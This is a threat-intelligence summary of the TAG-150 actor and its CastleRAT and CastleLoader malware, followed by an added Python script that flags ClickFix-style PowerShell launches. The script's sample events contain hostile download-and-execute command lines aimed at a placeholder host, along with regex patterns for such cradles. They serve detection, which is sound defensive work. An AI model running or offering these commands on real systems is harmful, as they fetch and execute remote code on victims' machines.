Insikt Group reveals TAG-150’s multi-tiered infrastructure and CastleRAT malware—an advanced threat actor evolving rapidly with stealth and scale.
Analysis Summary
# Threat Actor: TAG-150
## Attribution & Identity
**Identification:** TAG-150 (designation by Insikt Group).
**Aliases and Associations:** Associated with the development and use of malware families: CastleLoader, CastleBot, and CastleRAT. Potentially operates on a Malware-as-a-Service (MaaS) model, evidenced by the delivery of varied payloads and observable admin panels, though direct advertising has not been confirmed.
## Activity Summary
TAG-150 has been active since at least March 2025, demonstrating rapid development, technical sophistication, and responsiveness to public reporting. They utilize a large, multi-tiered infrastructure (Tier 1 through Tier 4) for operations. Recent activities include the deployment of newly developed malware, most notably CastleRAT (a new Remote Access Trojan). Infections are primarily initiated via Cloudflare-themed "ClickFix" phishing attacks or fraudulent GitHub repositories impersonating legitimate applications (e.g., software libraries, browser updates). These attacks rely on tricking victims into executing malicious PowerShell commands. The actor leverages various third-party services, including file-sharing platforms, messaging platforms, and anti-detection services like Kleenscan.
## Tactics, Techniques & Procedures
- **Initial Access:** Cloudflare-themed "ClickFix" phishing attacks; compromised GitHub repositories; tricking users into executing malicious PowerShell commands.
- **Defense Evasion/Execution:** Leveraging anti-detection services (e.g., Kleenscan).
- **Command & Control (C2):** Use of multi-tiered infrastructure (Tier 1 victim-facing C2s, higher-tier infrastructure).
- **Payload Delivery:** Use of initial infection vectors (CastleLoader, CastleBot) to drop secondary payloads like SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, and various information stealers.
- **Capabilities (CastleRAT):** Collecting system information, downloading/executing secondary payloads, executing commands via CMD and PowerShell.
- **MITRE ATT&CK IDs:** TA0011 (Command and Control) mentioned in alert metadata.
## Targeting
- **Sectors:** Not explicitly detailed, but methods (software libraries, development tools) suggest targeting software developers, and general organizations susceptible to phishing/supply chain compromise.
- **Geography:** Not specified in the summary.
- **Victims:** Not named specifically, but infection rates among interacting victims were noted as high (28.7%).
## Tools & Infrastructure
- **Malware families used:** CastleLoader, CastleBot, CastleRAT (Python and C variants), SectopRAT, WarmCookie, HijackLoader, NetSupport RAT, Stealc, RedLine Stealer, Rhadamanthys Stealer, DeerStealer, MonsterV2 (as secondary payloads).
- **Infrastructure:** Extensive, multi-tiered infrastructure (Tier 1 through Tier 4). Leverages specialized utilities/services like Kleenscan (kleenscan[.]com).
- **Infrastructure (C2, domains, IPs):** IOCs are blocked, but specific addresses are not detailed in the text provided, only mentioned in mitigation advice.
## Implications
TAG-150 represents a rapidly evolving and technically capable threat actor. Their adoption of a new, self-developed RAT (CastleRAT) and reliance on sophisticated social engineering (ClickFix) indicates a mature operation. Their multi-tiered infrastructure suggests resilience against takedowns. The high observed infection rate (28.7%) underscores the effectiveness of their initial access vectors.
## Mitigations
- Block IP addresses and domains associated with the loaders, infostealers, and RATs listed above.
- Flag and potentially block connections to unusual legitimate internet services (LIS), e.g., Pastebin.
- Deploy updated detection rules (YARA, Snort) for current and historical infections.
- Implement email filtering.
- Implement data exfiltration monitoring.
- Continuously monitor the cybercriminal ecosystem for emerging threats.
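The ClickFix vector described under Tactics, Techniques & Procedures (a user pasting a PowerShell command that fetches and runs a payload) and the detection-rule mitigation above can be illustrated with a process-creation check. This is an added example, not Insikt Group's code or a rule from the report; it assumes Sysmon-style process-creation events reduced to parent, image and command line, and the sample events and placeholder URLs are constructed.

```python
import re

# Constructed sample Windows process-creation events (Sysmon Event ID 1 style),
# reduced to the fields the check uses. They are not events from the report.
SAMPLE_EVENTS = [
    {"host": "ws-01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -c "irm http://placeholder.invalid/p.txt | iex"'},
    {"host": "ws-02", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1"},
    {"host": "ws-03", "parent": r"C:\Program Files\Vendor\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Service"},
    {"host": "ws-04", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c mshta http://placeholder.invalid/v"},
]

# A pasted ClickFix command is launched from the desktop shell (Run dialog,
# Explorer address bar), so the parent is explorer.exe rather than a service.
INTERACTIVE_PARENTS = ("explorer.exe",)
INTERPRETERS = ("powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe")

# Each matching indicator adds one point; the key is reported as the reason.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_command": re.compile(r"-e(?:nc|ncodedcommand)?\s+\S{20,}", re.I),
    "download_cradle": re.compile(
        r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring"
        r"|net\.webclient|mshta\s+https?://)", re.I),
    "dynamic_execution": re.compile(r"\biex\b|invoke-expression", re.I),
}

def score_event(ev):
    """Return (score, reasons) for one process-creation event."""
    reasons = []
    image = ev["image"].lower().rsplit("\\", 1)[-1]
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    if image not in INTERPRETERS:
        return 0, reasons  # not a script/HTML host; out of scope for this check
    if parent in INTERACTIVE_PARENTS:
        reasons.append("interactive_parent")
    reasons += [name for name, rx in INDICATORS.items() if rx.search(ev["cmdline"])]
    return len(reasons), reasons

def detect_clickfix(events, threshold=2):
    """Return alerts for events whose score reaches the threshold."""
    return [{"host": ev["host"], "score": s, "reasons": r}
            for ev in events for s, r in [score_event(ev)] if s >= threshold]

if __name__ == "__main__":
    for a in detect_clickfix(SAMPLE_EVENTS):
        print(f'{a["host"]}: score={a["score"]} reasons={",".join(a["reasons"])}')
```

A legitimate administrator launching a signed script from the shell scores only one point here (ws-02), so the threshold separates a pasted download-and-execute one-liner from routine interactive use.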